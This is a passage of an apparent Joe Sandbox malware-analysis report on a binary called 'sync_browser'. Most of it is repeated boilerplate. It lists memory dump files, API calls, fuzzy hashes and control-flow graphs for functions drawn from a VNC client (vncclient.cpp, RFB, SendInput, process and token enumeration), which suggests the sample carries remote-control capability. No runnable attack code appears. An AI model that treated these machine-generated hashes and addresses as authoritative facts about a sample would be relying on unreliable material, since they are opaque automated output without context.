                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateRect$malloc
                                                                                          • String ID:
                                                                                          • API String ID: 1122183891-0
                                                                                          • Opcode ID: 7ad3b45b6bc1a8438e929e5e1f418eabd285e39fca28ed775e144a5386d0bc8b
                                                                                          • Instruction ID: e2df4a96ef99a1486f796f1a5b613c7da63c62cd9f131befd6d858b5d103089e
                                                                                          • Opcode Fuzzy Hash: 7ad3b45b6bc1a8438e929e5e1f418eabd285e39fca28ed775e144a5386d0bc8b
                                                                                          • Instruction Fuzzy Hash: 3C018C33F69B1286EB14DFB8B455A29B3A9EBA87047148035EE5D83B45EE3CD068C344

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 393 7ff67e7e8590-7ff67e7e85de call 7ff67e7c3730 396 7ff67e7e85e0-7ff67e7e85e9 393->396 397 7ff67e7e862f-7ff67e7e8639 393->397 398 7ff67e7e8612-7ff67e7e861c 396->398 399 7ff67e7e85eb-7ff67e7e860e SendMessageA WaitForSingleObject 396->399 400 7ff67e7e8645-7ff67e7e864f 397->400 401 7ff67e7e863b-7ff67e7e863e 397->401 404 7ff67e7e861e-7ff67e7e8626 call 7ff67e7d4110 398->404 405 7ff67e7e8628 398->405 399->398 402 7ff67e7e8651-7ff67e7e8656 call 7ff67e878bf4 400->402 403 7ff67e7e865d-7ff67e7e8664 400->403 401->400 402->403 407 7ff67e7e869b-7ff67e7e86a5 403->407 408 7ff67e7e8666-7ff67e7e8688 call 7ff67e7c3730 403->408 404->405 405->397 411 7ff67e7e86b3-7ff67e7e86bd 407->411 412 7ff67e7e86a7-7ff67e7e86ac call 7ff67e8778d4 407->412 420 7ff67e7e8694 408->420 421 7ff67e7e868a-7ff67e7e868d 408->421 413 7ff67e7e86bf-7ff67e7e86c4 call 7ff67e8778d4 411->413 414 7ff67e7e86cb-7ff67e7e86d5 411->414 412->411 413->414 418 7ff67e7e86dc-7ff67e7e86e6 414->418 419 7ff67e7e86d7 call 7ff67e8778d4 414->419 425 7ff67e7e86ed-7ff67e7e86f7 418->425 426 7ff67e7e86e8 call 7ff67e8778d4 418->426 419->418 420->407 421->420 428 7ff67e7e86fe-7ff67e7e8704 425->428 429 7ff67e7e86f9 call 7ff67e8778d4 425->429 426->425 431 7ff67e7e8706-7ff67e7e870d 428->431 432 7ff67e7e8757-7ff67e7e8761 428->432 429->428 431->432 435 7ff67e7e870f-7ff67e7e8719 431->435 433 7ff67e7e8763 call 7ff67e878bf4 432->433 434 7ff67e7e8768-7ff67e7e8772 432->434 433->434 437 7ff67e7e8774-7ff67e7e8779 call 7ff67e878bf4 434->437 438 7ff67e7e877a-7ff67e7e8782 434->438 439 7ff67e7e871b-7ff67e7e8723 435->439 440 7ff67e7e8736-7ff67e7e873e call 7ff67e82a220 435->440 437->438 441 7ff67e7e8784-7ff67e7e878b call 7ff67e877914 438->441 442 7ff67e7e8790-7ff67e7e87b3 438->442 439->432 451 7ff67e7e8725-7ff67e7e8734 439->451 440->432 453 7ff67e7e8740-7ff67e7e8751 SendMessageA 440->453 441->442 447 7ff67e7e87b5-7ff67e7e87bb FreeLibrary 442->447 448 7ff67e7e87bc-7ff67e7e87dc call 7ff67e8778d4 * 2 442->448 447->448 458 7ff67e7e87de-7ff67e7e87e5 call 7ff67e877914 448->458 459 7ff67e7e87ea-7ff67e7e8896 DeleteObject call 7ff67e878bf4 DeleteObject call 7ff67e878bf4 DeleteObject call 7ff67e878bf4 DeleteObject call 7ff67e878bf4 448->459 451->432 451->440 453->432 458->459
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                                                          • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                                                          • API String ID: 2172171234-2418058073
                                                                                          • Opcode ID: 657a674c7d031777eac06996d4ae44a415d9bc6247f736f56e514ef20f35599a
                                                                                          • Instruction ID: 6057da59267b3dfb27fef48c4ba8fa2f7ff374bce60a5281266df6e15d19bd9e
                                                                                          • Opcode Fuzzy Hash: 657a674c7d031777eac06996d4ae44a415d9bc6247f736f56e514ef20f35599a
                                                                                          • Instruction Fuzzy Hash: 44812737A29A8285FB50DFA5D8543E96364FFA4F84F080231EA5D8BA99CF3D9449C310

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 1935883720-0
                                                                                          • Opcode ID: b06cfa2c7c9d91227a6909707f994effb4396744763fd6e6bbb979b6844d4978
                                                                                          • Instruction ID: 2aec46cb85b79b4f1d276f6c3d55bb5b5df6b7e1bb1dacffca269dad265b5957
                                                                                          • Opcode Fuzzy Hash: b06cfa2c7c9d91227a6909707f994effb4396744763fd6e6bbb979b6844d4978
                                                                                          • Instruction Fuzzy Hash: 7061B622B18A42C2FB109B6AE44437EA3A1EB99F95F554135FE5E87B94DF3CD449C300

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                                                          • String ID:
                                                                                          • API String ID: 772457954-0
                                                                                          • Opcode ID: e985c1ffb6018769c2b4a3bbbdc3cfbe5cf815ae3250197a8d1e99eeffc1a444
                                                                                          • Instruction ID: 504b908890730d54473aea5a96c55495f48179c50f41cbdf969a6cee31c18783
                                                                                          • Opcode Fuzzy Hash: e985c1ffb6018769c2b4a3bbbdc3cfbe5cf815ae3250197a8d1e99eeffc1a444
                                                                                          • Instruction Fuzzy Hash: 09617D37E2970286EB509F69A844279B3A4FB64B84F104535FA4E877A5DF3CE58EC700

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 578 7ff67e7df940-7ff67e7df979 579 7ff67e7df980-7ff67e7df9ab 578->579 580 7ff67e7df9b1-7ff67e7df9cc call 7ff67e877c50 579->580 581 7ff67e7dfb19-7ff67e7dfb25 579->581 587 7ff67e7df9cf 580->587 582 7ff67e7dfb29-7ff67e7dfb42 call 7ff67e877d30 581->582 588 7ff67e7dfb44 582->588 589 7ff67e7dfb50-7ff67e7dfb69 call 7ff67e877d30 582->589 590 7ff67e7df9d1-7ff67e7df9d3 587->590 588->579 592 7ff67e7dfb49-7ff67e7dfb4b 589->592 598 7ff67e7dfb6b-7ff67e7dfb95 call 7ff67e878bbc 589->598 590->592 593 7ff67e7df9d9-7ff67e7df9e5 590->593 594 7ff67e7dfc43-7ff67e7dfc6d call 7ff67e877220 592->594 596 7ff67e7df9eb-7ff67e7df9f4 593->596 597 7ff67e7dfae6-7ff67e7dfafc SleepEx 593->597 599 7ff67e7dfaaa 596->599 600 7ff67e7df9fa-7ff67e7dfa02 596->600 606 7ff67e7dfb02-7ff67e7dfb04 597->606 598->592 614 7ff67e7dfb97-7ff67e7dfbf8 call 7ff67e7c3730 598->614 602 7ff67e7dfaaf-7ff67e7dfab8 call 7ff67e82d1f0 599->602 600->599 604 7ff67e7dfa08-7ff67e7dfa0f 600->604 613 7ff67e7dfabd-7ff67e7dfac8 602->613 609 7ff67e7dfa11-7ff67e7dfa34 604->609 610 7ff67e7dfa39-7ff67e7dfa44 604->610 611 7ff67e7dfb12-7ff67e7dfb14 606->611 612 7ff67e7dfb06-7ff67e7dfb0d 606->612 615 7ff67e7dfaca-7ff67e7dfadd call 7ff67e82d890 609->615 616 7ff67e7dfa5e-7ff67e7dfa9e EnterCriticalSection LeaveCriticalSection 610->616 617 7ff67e7dfa46-7ff67e7dfa5c 610->617 611->590 612->587 613->597 613->615 627 7ff67e7dfc3e 614->627 628 7ff67e7dfbfa-7ff67e7dfc06 614->628 620 7ff67e7dfae2-7ff67e7dfae4 615->620 623 7ff67e7dfaa4-7ff67e7dfaa8 616->623 617->623 620->582 620->597 623->602 627->594 628->627 629 7ff67e7dfc08-7ff67e7dfc1d 628->629 629->627 631 7ff67e7dfc1f-7ff67e7dfc2c 629->631 631->627 632 7ff67e7dfc2e-7ff67e7dfc3a 631->632 632->627
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                                                          • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
                                                                                          • API String ID: 958158500-3765181313
                                                                                          • Opcode ID: 17b903c078d06ad7cc3db47b723f34c3a7649c56c41da682e2bb553595e5fa97
                                                                                          • Instruction ID: 08c4362782cf17ef41713aee4c6fc4da7449cb647f2c26455980d42990df6827
                                                                                          • Opcode Fuzzy Hash: 17b903c078d06ad7cc3db47b723f34c3a7649c56c41da682e2bb553595e5fa97
                                                                                          • Instruction Fuzzy Hash: 2891C127628B8286EB64CF25E4487AA77A5FB94B88F540132EA4D87798CF3CD44DC700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                                                          • String ID: ?
                                                                                          • API String ID: 2900023865-1684325040
                                                                                          • Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                                          • Instruction ID: c6694f7ecbb142da473066816dc0dc101d65a0d0f682269ee38bd5aba97ca261
                                                                                          • Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                                          • Instruction Fuzzy Hash: 53311C32A1DB8285E7608F25F84436AB3A8FBA9784F504135EACD87B59DF3DD059CB01

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                                                          • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
                                                                                          • API String ID: 1369618222-3178290357
                                                                                          • Opcode ID: ec845a1546a5472c739e5f35f5096180fd3e56c987b1b97795850a6a8f9d0181
                                                                                          • Instruction ID: 43a73e143d55ee5e369ddde06c0d16d8005c091d53052f3822e4f6e14faf1c2e
                                                                                          • Opcode Fuzzy Hash: ec845a1546a5472c739e5f35f5096180fd3e56c987b1b97795850a6a8f9d0181
                                                                                          • Instruction Fuzzy Hash: 00B1F733625BD1A6E348CF28EA443DDB7A8F754B44F14422AE3A847B91DF7A6076C740

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                                                          • String ID:
                                                                                          • API String ID: 1366308849-0
                                                                                          • Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                                          • Instruction ID: 028dd7c2f5d3802b88072c2bb491460581d36a1e01f3db12b4fbb943b44c3fe0
                                                                                          • Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                                          • Instruction Fuzzy Hash: 43315E27E2864296EB109F28E4441A9F3A1FFA5754F104636FA4E836A9DF3DD94DCB00

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                                                          • String ID:
                                                                                          • API String ID: 2120259006-0
                                                                                          • Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                                          • Instruction ID: 6a1889e54ec34e2b5d3bf6e4314dab99da75b5a0cecb38fb268fc0b3d83706b2
                                                                                          • Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                                          • Instruction Fuzzy Hash: DF513273614B81DEE764CF24D4843A9B7A4FB4870CF008526EB5C87A48DF38E6A9CB50

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                                                          • String ID:
                                                                                          • API String ID: 3283625137-0
                                                                                          • Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                                          • Instruction ID: 4de4535abaf53011602d8d6a00126c410d31a7cd33f436fcd75e27580640cc08
                                                                                          • Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                                          • Instruction Fuzzy Hash: 2F21B622A2878285F6149BA5E8416ADF294FF64B90F444635FE9D837D6CF3CE018C700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ComputerLibraryLoadName
                                                                                          • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                                                          • API String ID: 2278097360-3189507618
                                                                                          • Opcode ID: 10fb79c7f87763df2747a6739a812a0766dd5aff0ac26068f6513ed31ef1c4b4
                                                                                          • Instruction ID: 41df3cc95b198bef93cac32a48cd47756116e468d903f24ebc7d19abfaed68e7
                                                                                          • Opcode Fuzzy Hash: 10fb79c7f87763df2747a6739a812a0766dd5aff0ac26068f6513ed31ef1c4b4
